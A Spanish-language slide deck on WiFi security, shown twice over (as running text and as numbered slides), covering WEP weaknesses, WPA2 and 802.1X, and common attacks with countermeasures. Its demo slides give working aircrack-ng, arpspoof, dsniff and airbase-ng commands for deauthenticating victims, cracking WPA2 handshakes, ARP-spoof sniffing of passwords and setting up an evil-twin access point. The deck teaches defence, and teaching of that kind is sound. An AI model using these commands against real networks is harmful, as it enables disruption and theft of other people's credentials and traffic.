Seguridad en redes WiFi
Consideraciones de Seguridad,
Ataques Habituales y
Contramedidas
Kuko Armas <kuko@canarytek.com>
802.11 - 1997
¡¡Llegó la WiFi!!
(y llegaron los problemas)
2.4GHz vs 5 GHz
2.4 GHz 5 GHz
802.11b/g/n 802.11a/n/ac
Mayor Alcance Menor alcance
Cualquier dispositivo Menos compatible
3 canales no solapados 24 canales no solapados
Congestionado con WIFI Menos congestión con WIFI
Muchas interferencias externas Muy pocas interferencias externas
¿Por que solo 3 canales?
... si yo he visto hasta 14...
● Universal: 1,6,11
● Europa: 1,5,9,13
Interferencias WIFI
● Mismo canal: Canal 1 y Canal 6
● Canal solapado: Canales 11 y 13
Interferencias Externas
Sin un analizador de espectro no podemos verlas, y
nuestra WiFi funcionará mal
Los (tristes) inicios
(In)Seguridad
WIFI (antes de
802.11i - 2004)
Autenticación
● Open System
● Realmente no hay autenticación
● Solo se verifica la compatibilidad
● Shared Key
● Realmente es PEOR que el anterior (si, en serio)
● Envía un desafío en texto claro. Facilita el ataque a
la clave WEP
● No sólo afecta a autenticación, también a cifrado
WEP (¿Es un chiste?)
● Wired Equivalent Privacy. Un nombre desafortunado
● 64 o 128 bits (24 bits de IV). Usa RC4
● El IV se envía en plano
● Sólo tenemos 24 bits de IV. El IV se repiten cada
2^24 tramas (5 horas con tráfico)
● Weak Key Attack: RC4 genera claves débiles
● Reinjection Attack: para acelerar la colisión de IV
● Bit-Flipping Attack: El CRC es considerado débil, lo
que permite modificar un paquete sin que el ICV lo
detecte
● Combinando los ataques anteriores, se puede
romper el cifrado WEP en menos de 5 minutos
Filtros por MAC
● Control de acceso por dirección física (MAC)
● No definido en estándar, pero implementado por
fabricantes
● Gestión engorrosa (aunque es posible centralizar con
Radius)
● No es seguro, modificar una MAC es TRIVIAL
Redes “Invisibles” (SSID Cloack)
● Las redes se anuncian mediante paquetes “beacon”
● Para "ocultar" la red, el ESSID puede ir a NULL
● Passive/Active Scanning (Beacon/Probe)
● El AP responderá con el ESSID a cualquier cliente que
ponga el ESSID en el probe
● Con un sniffer o analizador de protocolo se descubre
la red "oculta" de forma inmediata
● "Seguridad por desconocimiento" -> Mala seguridad
● No esta definido en el estándar. Depende de la
implementación del fabricante
El presente
802.11i (2004) y
802.11-2012
“Amendment” 802.11i – 2004
● Introduce nuevas soluciones para Autenticación y
Cifrado
● Incluído en Estándar 802.11-2007 y posteriores
● Fué adoptado por fabricantes antes de ratificarse. La
WIFI Alliance lo definió como WPA (WIFI Protected
Access)
● Una vez ratificado, la WIFI Alliance definió WPA2
Mejoras introducidas en 802.11i
● Robust Network Security: Nueva máquina de estados
● Autenticación: Se añade 802.1X/EAP
● Cifrado: Nuevos algoritmos y protocolos
● Intercambio de claves: 4-Way Handshake
● Cifrado: TKIP/RC4 y CCMP/AES
Robust Network Security
● Todo el tráfico esta cifrado y autenticado
● RNSA: RNS Association
● Se utilizan 2 claves “maestras” generadas
durante la autenticación
● Pairwise Master Key: unicast
● Group Master Key: broadcast / multicast
● Con las anteriores, se generan claves
temporales usadas para cifrar:
● Pairwise Transient Key: unicast
● Group Transient Key: broadcast /
multicast
● Estas ultimas se generan mediante el 4-
Way Handshake
802.1X/EAP (WPA2/Enterprise)
● No es una tecnología WIFI (también para redes
cableadas)
● Componentes
● Supplicant: Dispositivo Wifi
● Authenticator: AP Wifi
● Authentication server: Servidor Radius
● Varios tipos de EAP (algunos inseguros)
● LEAP: No estándar e inseguro, NO USAR
● EAP-TLS: Estándar, basada en certificados digitales
● PEAP: Estándar y seguro (Tunel TLS. Autenticación
del servidor con certificado digital)
802.1X/PEAP (WPA2/Enterprise)
PreShared Key: WPA2/Personal
● Se realiza el 4-Way Handshake a partir de una clave
compartida previamente (PSK)
● WPA: Antes de la ratificación
● TKIP/RC4
● WPA2: Después de la ratificación
● TKIP/RC4
● CCMP/AES
● DPSK: Dynamic PSK (claves compartidas diferentes
para cada cliente)
● Resuelve los problemas de PSK sin la complejidad
de 802.1X
● No esta definido en el estándar
● Pocos fabricantes lo tienen
4-Way handshake
Partimos de las claves maestras:
● En 802.1X la PMK se intercambia
en la autenticación y es DISTINTA
para cada usuario
● En WPA2/Personal (PSK), la
PMK se deriva de la clave
compartida
O cómo crear claves de cifrado de forma segura...
Consideraciones adicionales
Otras
consideraciones
de seguridad
Otras consideraciones
● Segmentación de trafico
● VLANs: Por ESSID u por usuario (Radius)
● RBAC: Usuarios, roles y permisos
● Seguridad de la infraestructura
● Seguridad física
● Seguridad de interfaz de gestión
● Redes Privadas Virtuales (VPN): Siempre que
estemos en redes publicas
Guest WLAN
● Deben mapearse a una VLAN especifica aislada
● Debe protegerse mediante firewalls que bloqueen el
acceso a las redes de la organización
● No debe permitirse el acceso a los equipos WIFI
● Permitir sólo servicios controlados
● Aislamiento de clientes
● Captive Web Portal: Autenticación y aceptación de
condiciones
● Gestión de invitados: Creación dinámica de usuarios,
etc
Ataques a redes WIFI
Ataques
habituales y
contramedidas
Particularidades
● Acceso físico y alcance no delimitado
● Universalidad y Ubiquidad (y va a más)
● Cualquier red pública (Internet, Cybers, WIFI, etc) es
un “entorno hostil”
● Desconocimiento de los riesgos
● Los dispositivos no siempre muestran la información
necesaria para protegerse
● Se sacrifica la “seguridad” por la “usabilidad”
● Lo siento, pero.... ¡¡¡Falta de Sentido Común!!!
Atacante vs Auditor
Atacante:
● Software: Kali Linux o similar
● Hardware: Adaptadores WIFI “avanzados”
● Un poco de “cerebro” (tampoco demasiado)
Auditor:
● Las mismas herramientas que el atacante
● Herramienta de análisis del medio físico (analizador
de espectro)
● Algo más de cerebro que el atacante (el auditor debe
entender cómo funcionan los ataques)
Descubrimiento, Análisis y
Escuchas Ilegales
● Medio compartido en frecuencia libre
● Cualquiera tiene acceso
● A menudo redes sin protección
● PSK global (fácil acceso o ingeniería social)
● Herramientas de monitorización y descubrimiento
(WIFI e IP)
● Donde esta el limite?
● Herramientas de descubrimiento y analisis
● WIFI: WifiAnalyzer, InSSIDer, WiFiFoFum, WIFI
Scanner, etc
● Red: Analizadores de protocolo (WireShark, EyePA,
etc)
Ataques DoS
Ataques de
Denegación de
Servicio (DoS)
Denial of Service (DoS)
● Físico: Ataque al medio de transmisión
● Se detecta con analizador de espectro
● Intencionado: WIFI Jammer
● Accidental: interferencias
● Lógico:
● Se detecta con analizador de protocolo o WIDS
● Varios tipo: Assoc flood, Auth Flood, PS-Poll flood,
Virtual carrier attack, DeAuth
Contramedidas
● Físico: No existen. Monitorización
● Lógico: 802.11w Management Frame Protection
DoS Físico
Ataque: WIFI Jammer
Interferencia: Transmisor A / V
Solo se detecta con analizador de espectro
Interferencias WIFI (2.4 vs 5 GHz)
Interferencias no WIFI
Hay tres tipos de interferencia
● Mismo canal: MALA
● Canal solapado: MUY MALA
● No WIFI: MUY MALA
DEMO: DoS Lógico (Deauth)
● Activamos modo monitor
● airodump­ng start wlan0
● Monitorizamos trafico
● airodump­ng mon0
● Seleccionamos victima MAC y BSSID
● Enviamos deauth
● aireplay­ng ­­deauth 1 ­a BSSID ­c MAC_VICTIMA mon0
● O continuo (de MUY mal gusto)
Ataques a Infraestructura
Ataques a
Infraestructura
WIFI
Rogue AP (AP no autorizados)
● Accidental o intencionado
● Acceso a la red cableado sin restricciones
● OJO con las conexiones Ad-hoc en equipos
conectados a la red
Contramedidas:
● Seguridad en red cableada (802.1X y 802.1AE)
● Monitorización y detección (WIDS/WIPS)
Ataques al cifrado
● Acceso a la infraestructura (riesgo similar a Rogue
AP)
● También abre la puerta a ataques peer to peer
● WPA2/Personal (PSK) vulnerable a ataque de
diccionario (DEMO)
● 802.1X/EAP: LEAP vulnerable, NO USAR
● Usar certificados autofirmados o con CA propia!
Contramedidas
● No usar PSK (Usar 802.11X o DPSK)
● Si no queda mas remedio, usar claves largas y
complicadas
● !a@s#d$f%g555 !@#$%1234pacr1234!@#$%
DEMO: Ataque a cifrado WPA2/PSK
●Activamos modo monitor
● airodump-ng start wlan0
● Monitorizamos trafico para elegir la victima
● airodump-ng mon0
● Necesitamos capturar un 4-Way Handshake de esa
estación
● airodump-ng --bssid BSSID --channel CANAL -w psk mon0
● Desconectamos a la victima para forzar un handshake
● aireplay-ng --deauth 1 -a BSSID -c MAC_VICTIMA mon0
● Una vez capturado el handshake podemos lanzar el
ataque de diccionario
● aircrack-ng -w rockyou.txt psk-01.cap
Otros ataques
● MAC Spoofing (no ARP spoof)
● Ataque a filtros por MAC
● Falsa sensación de seguridad
● Trivial
● Management Interface Exploits
● Ataque a infraestructuras mediante los protocolos de
gestión
Contramedidas
● No usar filtros MAC como única medida de seguridad
(ni en WIFI, ni en nada)
● No permitir acceso de gestión desde redes no
confiables
Ataques al usuario
Ataques al
usuario WIFI
Ataques Peer to Peer (a usuarios)
● Redes Ad-hoc
● Redes públicas (o semipúblicas)
● Mismo segmento de red (nivel 2)
Contramedidas
● Protección particular (firewall)
● Utilización de VPN en redes publicas
● Aislamiento de clientes
WIFI Hijack
● ARP Spoof:
● Necesitamos estar en la misma red que la víctima
● Permite capturar trafico destinado a otra máquina
● Evil twin:
● Mismo ESSID (y BSSID) que el "legitimo"
● Man in the Middle (MITM): No necesariamente WIFI
● Capturas de trafico, claves, imágenes, etc
● Ataques MITM a SSL (webmitm y sslstrip)
Contramedidas:
● AP publico "falso": Usar siempre VPN
● Evil Twin: Usar 802.1X/EAP
● ARP Spoof: Protección ARP spoof
● MITM en general: En red publica usar VPN
DEMO: ARP Spoof y MITM
● Activamos enrutado
● echo 1 > /proc/sys/net/ipv4/ip_forward
● Escaneo la red y elijo a la victima
● nmap -sP 192.168.43.1/24
● ARP Spoof
● arpspoof -i wlan1 -r -t IP_VICTIMA IP_ROUTER
● Ojo con iptables, permitir todo el trafico
● Capturar url
● urlsnarf -i wlan1
● Capturar imagenes
● driftnet -i wlan1
● Capturar claves
● dsniff -i wlan1
Demo “Evil Twin”
● Seleccionamos el ESSID que queremos atacar
● Preparamos una configuración DHCP similar a la de la
red "real"
● Levantamos el AP falso
● airbase-ng --essid ESSID mon0
● Levantamos el interfaz at0 con la misma IP que la red
"real"
● ifconfig at0 192.168.43.1 netmask 255.255.255.0 up
● Levantamos el dhcp
● dhcpd at0 -f
● Nos anunciamos con mas potencia que el AP “victima”
● Forzamos desconexión de la/s victimas
Ataques MITM
Ataques
“Hombre en el
Medio” (MITM)
Ataques MITM
● Consiste en “situarse” en el medio de las
comunicaciones de la victima
● Necesario para capturar tráfico cifrado
DEMO:
● webmitm
● Interceptamos las conexiones SSL y “suplantamos”
al servidor de destino para capturar el trafico cifrado
● Sslstrip
● Modifica los enlaces a paginas seguras (HTTPS)
para que sigan usando conexiones inseguras (HTTP)
Wi..FiN
Wi...FiN
Gracias por su
atención...
...si siguen ahí...
Kuko Armas <kuko@canarytek.com>

Seguridad wifi

  • 1.
    Seguridad en redesWiFi Consideraciones de Seguridad, Ataques Habituales y Contramedidas Kuko Armas <kuko@canarytek.com>
  • 2.
    802.11 - 1997 ¡¡Llególa WiFi!! (y llegaron los problemas)
  • 3.
    2.4GHz vs 5GHz 2.4 GHz 5 GHz 802.11b/g/n 802.11a/n/ac Mayor Alcance Menor alcance Cualquier dispositivo Menos compatible 3 canales no solapados 24 canales no solapados Congestionado con WIFI Menos congestión con WIFI Muchas interferencias externas Muy pocas interferencias externas
  • 4.
    ¿Por que solo3 canales? ... si yo he visto hasta 14... ● Universal: 1,6,11 ● Europa: 1,5,9,13
  • 5.
    Interferencias WIFI ● Mismocanal: Canal 1 y Canal 6 ● Canal solapado: Canales 11 y 13
  • 6.
    Interferencias Externas Sin unanalizador de espectro no podemos verlas, y nuestra WiFi funcionará mal
  • 7.
  • 8.
    Autenticación ● Open System ●Realmente no hay autenticación ● Solo se verifica la compatibilidad ● Shared Key ● Realmente es PEOR que el anterior (si, en serio) ● Envía un desafío en texto claro. Facilita el ataque a la clave WEP ● No sólo afecta a autenticación, también a cifrado
  • 9.
    WEP (¿Es unchiste?) ● Wired Equivalent Privacy. Un nombre desafortunado ● 64 o 128 bits (24 bits de IV). Usa RC4 ● El IV se envía en plano ● Sólo tenemos 24 bits de IV. El IV se repiten cada 2^24 tramas (5 horas con tráfico) ● Weak Key Attack: RC4 genera claves débiles ● Reinjection Attack: para acelerar la colisión de IV ● Bit-Flipping Attack: El CRC es considerado débil, lo que permite modificar un paquete sin que el ICV lo detecte ● Combinando los ataques anteriores, se puede romper el cifrado WEP en menos de 5 minutos
  • 10.
    Filtros por MAC ●Control de acceso por dirección física (MAC) ● No definido en estándar, pero implementado por fabricantes ● Gestión engorrosa (aunque es posible centralizar con Radius) ● No es seguro, modificar una MAC es TRIVIAL
  • 11.
    Redes “Invisibles” (SSIDCloack) ● Las redes se anuncian mediante paquetes “beacon” ● Para "ocultar" la red, el ESSID puede ir a NULL ● Passive/Active Scanning (Beacon/Probe) ● El AP responderá con el ESSID a cualquier cliente que ponga el ESSID en el probe ● Con un sniffer o analizador de protocolo se descubre la red "oculta" de forma inmediata ● "Seguridad por desconocimiento" -> Mala seguridad ● No esta definido en el estándar. Depende de la implementación del fabricante
  • 12.
  • 13.
    “Amendment” 802.11i –2004 ● Introduce nuevas soluciones para Autenticación y Cifrado ● Incluído en Estándar 802.11-2007 y posteriores ● Fué adoptado por fabricantes antes de ratificarse. La WIFI Alliance lo definió como WPA (WIFI Protected Access) ● Una vez ratificado, la WIFI Alliance definió WPA2
  • 14.
    Mejoras introducidas en802.11i ● Robust Network Security: Nueva máquina de estados ● Autenticación: Se añade 802.1X/EAP ● Cifrado: Nuevos algoritmos y protocolos ● Intercambio de claves: 4-Way Handshake ● Cifrado: TKIP/RC4 y CCMP/AES
  • 15.
    Robust Network Security ●Todo el tráfico esta cifrado y autenticado ● RNSA: RNS Association ● Se utilizan 2 claves “maestras” generadas durante la autenticación ● Pairwise Master Key: unicast ● Group Master Key: broadcast / multicast ● Con las anteriores, se generan claves temporales usadas para cifrar: ● Pairwise Transient Key: unicast ● Group Transient Key: broadcast / multicast ● Estas ultimas se generan mediante el 4- Way Handshake
  • 16.
    802.1X/EAP (WPA2/Enterprise) ● Noes una tecnología WIFI (también para redes cableadas) ● Componentes ● Supplicant: Dispositivo Wifi ● Authenticator: AP Wifi ● Authentication server: Servidor Radius ● Varios tipos de EAP (algunos inseguros) ● LEAP: No estándar e inseguro, NO USAR ● EAP-TLS: Estándar, basada en certificados digitales ● PEAP: Estándar y seguro (Tunel TLS. Autenticación del servidor con certificado digital)
  • 17.
  • 18.
    PreShared Key: WPA2/Personal ●Se realiza el 4-Way Handshake a partir de una clave compartida previamente (PSK) ● WPA: Antes de la ratificación ● TKIP/RC4 ● WPA2: Después de la ratificación ● TKIP/RC4 ● CCMP/AES ● DPSK: Dynamic PSK (claves compartidas diferentes para cada cliente) ● Resuelve los problemas de PSK sin la complejidad de 802.1X ● No esta definido en el estándar ● Pocos fabricantes lo tienen
  • 19.
    4-Way handshake Partimos delas claves maestras: ● En 802.1X la PMK se intercambia en la autenticación y es DISTINTA para cada usuario ● En WPA2/Personal (PSK), la PMK se deriva de la clave compartida O cómo crear claves de cifrado de forma segura...
  • 20.
  • 21.
    Otras consideraciones ● Segmentaciónde trafico ● VLANs: Por ESSID u por usuario (Radius) ● RBAC: Usuarios, roles y permisos ● Seguridad de la infraestructura ● Seguridad física ● Seguridad de interfaz de gestión ● Redes Privadas Virtuales (VPN): Siempre que estemos en redes publicas
  • 22.
    Guest WLAN ● Debenmapearse a una VLAN especifica aislada ● Debe protegerse mediante firewalls que bloqueen el acceso a las redes de la organización ● No debe permitirse el acceso a los equipos WIFI ● Permitir sólo servicios controlados ● Aislamiento de clientes ● Captive Web Portal: Autenticación y aceptación de condiciones ● Gestión de invitados: Creación dinámica de usuarios, etc
  • 23.
    Ataques a redesWIFI Ataques habituales y contramedidas
  • 24.
    Particularidades ● Acceso físicoy alcance no delimitado ● Universalidad y Ubiquidad (y va a más) ● Cualquier red pública (Internet, Cybers, WIFI, etc) es un “entorno hostil” ● Desconocimiento de los riesgos ● Los dispositivos no siempre muestran la información necesaria para protegerse ● Se sacrifica la “seguridad” por la “usabilidad” ● Lo siento, pero.... ¡¡¡Falta de Sentido Común!!!
  • 25.
    Atacante vs Auditor Atacante: ●Software: Kali Linux o similar ● Hardware: Adaptadores WIFI “avanzados” ● Un poco de “cerebro” (tampoco demasiado) Auditor: ● Las mismas herramientas que el atacante ● Herramienta de análisis del medio físico (analizador de espectro) ● Algo más de cerebro que el atacante (el auditor debe entender cómo funcionan los ataques)
  • 26.
    Descubrimiento, Análisis y EscuchasIlegales ● Medio compartido en frecuencia libre ● Cualquiera tiene acceso ● A menudo redes sin protección ● PSK global (fácil acceso o ingeniería social) ● Herramientas de monitorización y descubrimiento (WIFI e IP) ● Donde esta el limite? ● Herramientas de descubrimiento y analisis ● WIFI: WifiAnalyzer, InSSIDer, WiFiFoFum, WIFI Scanner, etc ● Red: Analizadores de protocolo (WireShark, EyePA, etc)
  • 27.
  • 28.
    Denial of Service(DoS) ● Físico: Ataque al medio de transmisión ● Se detecta con analizador de espectro ● Intencionado: WIFI Jammer ● Accidental: interferencias ● Lógico: ● Se detecta con analizador de protocolo o WIDS ● Varios tipo: Assoc flood, Auth Flood, PS-Poll flood, Virtual carrier attack, DeAuth Contramedidas ● Físico: No existen. Monitorización ● Lógico: 802.11w Management Frame Protection
  • 29.
    DoS Físico Ataque: WIFIJammer Interferencia: Transmisor A / V Solo se detecta con analizador de espectro
  • 30.
  • 31.
    Interferencias no WIFI Haytres tipos de interferencia ● Mismo canal: MALA ● Canal solapado: MUY MALA ● No WIFI: MUY MALA
  • 32.
    DEMO: DoS Lógico(Deauth) ● Activamos modo monitor ● airodump­ng start wlan0 ● Monitorizamos trafico ● airodump­ng mon0 ● Seleccionamos victima MAC y BSSID ● Enviamos deauth ● aireplay­ng ­­deauth 1 ­a BSSID ­c MAC_VICTIMA mon0 ● O continuo (de MUY mal gusto)
  • 33.
    Ataques a Infraestructura Ataquesa Infraestructura WIFI
  • 34.
    Rogue AP (APno autorizados) ● Accidental o intencionado ● Acceso a la red cableado sin restricciones ● OJO con las conexiones Ad-hoc en equipos conectados a la red Contramedidas: ● Seguridad en red cableada (802.1X y 802.1AE) ● Monitorización y detección (WIDS/WIPS)
  • 35.
    Ataques al cifrado ●Acceso a la infraestructura (riesgo similar a Rogue AP) ● También abre la puerta a ataques peer to peer ● WPA2/Personal (PSK) vulnerable a ataque de diccionario (DEMO) ● 802.1X/EAP: LEAP vulnerable, NO USAR ● Usar certificados autofirmados o con CA propia! Contramedidas ● No usar PSK (Usar 802.11X o DPSK) ● Si no queda mas remedio, usar claves largas y complicadas ● !a@s#d$f%g555 !@#$%1234pacr1234!@#$%
  • 36.
    DEMO: Ataque acifrado WPA2/PSK ●Activamos modo monitor ● airodump-ng start wlan0 ● Monitorizamos trafico para elegir la victima ● airodump-ng mon0 ● Necesitamos capturar un 4-Way Handshake de esa estación ● airodump-ng --bssid BSSID --channel CANAL -w psk mon0 ● Desconectamos a la victima para forzar un handshake ● aireplay-ng --deauth 1 -a BSSID -c MAC_VICTIMA mon0 ● Una vez capturado el handshake podemos lanzar el ataque de diccionario ● aircrack-ng -w rockyou.txt psk-01.cap
  • 37.
    Otros ataques ● MACSpoofing (no ARP spoof) ● Ataque a filtros por MAC ● Falsa sensación de seguridad ● Trivial ● Management Interface Exploits ● Ataque a infraestructuras mediante los protocolos de gestión Contramedidas ● No usar filtros MAC como única medida de seguridad (ni en WIFI, ni en nada) ● No permitir acceso de gestión desde redes no confiables
  • 38.
  • 39.
    Ataques Peer toPeer (a usuarios) ● Redes Ad-hoc ● Redes públicas (o semipúblicas) ● Mismo segmento de red (nivel 2) Contramedidas ● Protección particular (firewall) ● Utilización de VPN en redes publicas ● Aislamiento de clientes
  • 40.
    WIFI Hijack ● ARPSpoof: ● Necesitamos estar en la misma red que la víctima ● Permite capturar trafico destinado a otra máquina ● Evil twin: ● Mismo ESSID (y BSSID) que el "legitimo" ● Man in the Middle (MITM): No necesariamente WIFI ● Capturas de trafico, claves, imágenes, etc ● Ataques MITM a SSL (webmitm y sslstrip) Contramedidas: ● AP publico "falso": Usar siempre VPN ● Evil Twin: Usar 802.1X/EAP ● ARP Spoof: Protección ARP spoof ● MITM en general: En red publica usar VPN
  • 41.
    DEMO: ARP Spoofy MITM ● Activamos enrutado ● echo 1 > /proc/sys/net/ipv4/ip_forward ● Escaneo la red y elijo a la victima ● nmap -sP 192.168.43.1/24 ● ARP Spoof ● arpspoof -i wlan1 -r -t IP_VICTIMA IP_ROUTER ● Ojo con iptables, permitir todo el trafico ● Capturar url ● urlsnarf -i wlan1 ● Capturar imagenes ● driftnet -i wlan1 ● Capturar claves ● dsniff -i wlan1
  • 42.
    Demo “Evil Twin” ●Seleccionamos el ESSID que queremos atacar ● Preparamos una configuración DHCP similar a la de la red "real" ● Levantamos el AP falso ● airbase-ng --essid ESSID mon0 ● Levantamos el interfaz at0 con la misma IP que la red "real" ● ifconfig at0 192.168.43.1 netmask 255.255.255.0 up ● Levantamos el dhcp ● dhcpd at0 -f ● Nos anunciamos con mas potencia que el AP “victima” ● Forzamos desconexión de la/s victimas
  • 43.
  • 44.
    Ataques MITM ● Consisteen “situarse” en el medio de las comunicaciones de la victima ● Necesario para capturar tráfico cifrado DEMO: ● webmitm ● Interceptamos las conexiones SSL y “suplantamos” al servidor de destino para capturar el trafico cifrado ● Sslstrip ● Modifica los enlaces a paginas seguras (HTTPS) para que sigan usando conexiones inseguras (HTTP)
  • 45.
    Wi..FiN Wi...FiN Gracias por su atención... ...sisiguen ahí... Kuko Armas <kuko@canarytek.com>